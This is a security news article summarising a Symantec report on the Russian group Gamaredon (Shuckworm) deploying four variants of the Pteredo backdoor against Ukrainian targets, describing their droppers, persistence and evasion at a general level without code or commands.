New variants of the bespoke Pteredo backdoor are being used by the Russian state-sponsored threat group Gamaredon (a.k.a. Armageddon/Shuckworm) to launch assaults against targets in Ukraine, according to threat analysts.
Since at least 2014, Gamaredon has been conducting cyber-espionage efforts against the Ukrainian government and other key institutions.
The actor is well-known for focusing on Ukraine, with over 5,000 cyberattacks on 1,500 public and commercial entities in the country ascribed to it.
According to Symantec, the actor is presently deploying at least four variations of the “Pteredo” virus, also known as Pteranodon, according to a report.
The backdoor’s origins may be found in Russian hacker forums dating back to 2016, where Shuckworm took it and began privately developing it with specialized DLL modules and functionality for data theft, remote access, and analysis evasion.
Recent events
The different payloads delivered against Ukrainian targets recently completed similar duties, according to Symantec’s analysts, although each communicates with a distinct command and control server server address.
This shows that the threat actor is utilizing a variety of slightly different payloads to achieve redundancy and establish persistence that is resistant to malware cleaning procedures.
Threat actors utilize disguised VBS droppers to add Scheduled Tasks and subsequently fetch additional modules from the C2 in all four variants detected.
Pteredo.B — A self-extracting 7-Zip archive containing numerous VBScripts focused on data gathering and persistence.
Pteredo.C is a VBScript-based variation that starts with an API hammering process to avoid running in an analyst’s sandbox. PowerShell scripts are retrieved and executed from external sources.
Pteredo.D — Another VBScript dropper that flushes DNS before fetching payloads, running commands, and erasing evidence of early infection phases.
Pteredo.E — A variation that combines the characteristics of the previous three, such as strong obfuscation and API pounding.
The UltraVNC remote access tool and the Microsoft Process Explorer for handling DLL module processes were also used and abused in recent Shuckworm assaults.
Likenesses to the January campaign
Looking at Shuckworm’s activities against Ukrainian targets since January 2022, it’s simple to conclude that the threat group’s tactics haven’t changed much.
Pteredo backdoor variants were dropped via VBS files hidden inside DOC file attachments on spear-phishing emails in earlier incidents.
In January, the self-extracting binaries 7-Zip, which require minimal user intervention, were also employed, as was UltraVNC and Process Explorer misuse.
While Shuckworm/Gamaredon is a sophisticated gang, its toolset and infection strategies have remained unchanged in recent months, making detection and defense tactics easier.
However, the Pteredo backdoor is still in active development, and the threat group may be working on a revamped and far more potent or stealthy version of the virus, as well as a new attack chain.
